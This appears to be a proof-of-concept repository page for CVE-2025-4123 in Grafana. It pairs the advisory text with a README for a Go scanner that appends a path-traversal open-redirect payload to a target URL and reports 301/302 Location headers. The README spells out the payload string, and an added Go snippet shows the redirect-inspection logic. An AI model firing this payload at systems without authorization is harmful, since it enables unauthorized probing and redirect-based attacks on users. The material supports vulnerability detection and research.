
CVE-2025-4123 PoC — Grafana security vulnerability

Associated Vulnerability
Title: Grafana security vulnerability (CVE-2025-4123)
Description: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS through the `connect-src` directive.
Description: CVE-2025-4123 Grafana Open Redirect Exploit
Readme
# CVE-2025-4123 PoC

**A small proof-of-concept tool** — sends a specific payload to a target and checks for 301/302 redirect responses, reporting the `Location` header.

> This repository is intended for educational/research purposes only. Follow responsible disclosure policies. Below are usage and build instructions.

---

## Summary

This tool sends a request to a domain with the following payload appended, and if the server responds with 301 (Moved Permanently) or 302 (Found), it checks the `Location` header to detect a potential vulnerability.

Payload: `/public/..%2F%5cgoogle.com%2F%3f%2F..%2F..`

The program disables Go's automatic redirect following via the `CheckRedirect` function, allowing inspection of the initial response.

---

## Requirements

* Go 1.20+ (or any recent Go version)
* Internet access (for the target domain)

---

## Build

You can build an executable (Windows `.exe`) with the following commands:

```bash
# Linux/macOS
go build -o cve-2025-4123 main.go

# Windows (PowerShell or CMD)
go build -o CVE-2025-4123.exe main.go
```

---

## Usage

```
Usage: CVE-2025-4123.exe [https://example.com]
```

Example:

```bash
./CVE-2025-4123.exe https://target.example.com
```

The program does the following:

* Sends a GET request to the provided domain (`os.Args[1]`) with the payload appended.
* If the response is 301 or 302, it prints the `Location` header: `VULN FOUND: <location>`
* Otherwise, it prints `CVE-2025-4123 Not Found`.
* Any redirected requests are also printed via the `CheckRedirect` callback: `Redirected to <URL>`.

---

## Example Output

Successful detection (example):

```
VULN FOUND: https://google.com/
```

Redirect tracking via `CheckRedirect` callback might output:

```
Redirected to  https://google.com/
```

---

## Notes

* By default, `http.Get` automatically follows 301/302 redirects. In this PoC, `CheckRedirect` is used to disable automatic following, allowing direct access to the `Location` header.
* The `Location` header may not always be an absolute URL; it could be relative or in another format. In such cases, use `url.Parse` and `resp.Request.URL.ResolveReference` to construct the full URL.
* Do not test on systems without permission. Unauthorized testing may be illegal.
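The two mechanics the notes above rely on, as an added example that is not the repository's `main.go`: a client whose `CheckRedirect` returns `http.ErrUseLastResponse` so the first response (and its raw `Location`) is what you see, and a `resolveLocation` helper that normalises absolute, relative and scheme-relative `Location` values against the requested URL with `url.Parse` and `ResolveReference` and reports whether the result lands on a different host. Function names are assumptions of this example.

```go
package main

import (
	"errors"
	"net/http"
	"net/url"
	"strings"
)

// noFollowClient returns a client that stops at the first response instead of
// following 301/302 redirects, so the original Location header stays visible.
func noFollowClient() *http.Client {
	return &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
}

// probe sends one GET to target and returns the status code and the raw
// Location header of the first response (empty when there is no redirect).
func probe(client *http.Client, target string) (int, string, error) {
	resp, err := client.Get(target)
	if err != nil {
		return 0, "", err
	}
	defer resp.Body.Close()
	return resp.StatusCode, resp.Header.Get("Location"), nil
}

// resolveLocation makes a Location value absolute against the requested URL
// (absolute, relative and scheme-relative forms) and reports whether it points
// at a host other than the one that was requested.
func resolveLocation(requested, location string) (string, bool, error) {
	if strings.TrimSpace(location) == "" {
		return "", false, errors.New("empty Location header")
	}
	base, err := url.Parse(requested)
	if err != nil {
		return "", false, err
	}
	loc, err := url.Parse(location)
	if err != nil {
		return "", false, err
	}
	abs := base.ResolveReference(loc)
	offHost := !strings.EqualFold(abs.Hostname(), base.Hostname())
	return abs.String(), offHost, nil
}
```

A scheme-relative `Location` such as `//example.org/` resolves to the requesting scheme plus that host, which is why comparing hostnames after resolution is more reliable than checking whether the raw header starts with `http`.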

---

## Development / Improvement Suggestions

* Add CLI argument validation and flags like `--timeout`.
* Add output options `-o/--output` to save results in JSON or CSV.
* Implement parallel scanning (concurrency) carefully to avoid overloading targets.
* Handle empty or unexpected `Location` headers with robust parsing/normalization.

---


## Responsible Disclosure

If this PoC detects a real vulnerability, contact the target organization's security team and report it responsibly. Coordinate with the organization before making any public disclosure.

---

File Snapshot

```
/data/pocs/56e449822af030a5c24cae4042768ecae293c569
├── [7.9M] CVE-2025-4123.exe
├── [  21] go.mod
├── [3.3K] main.go
└── [2.8K] README.md

1 directory, 4 files
```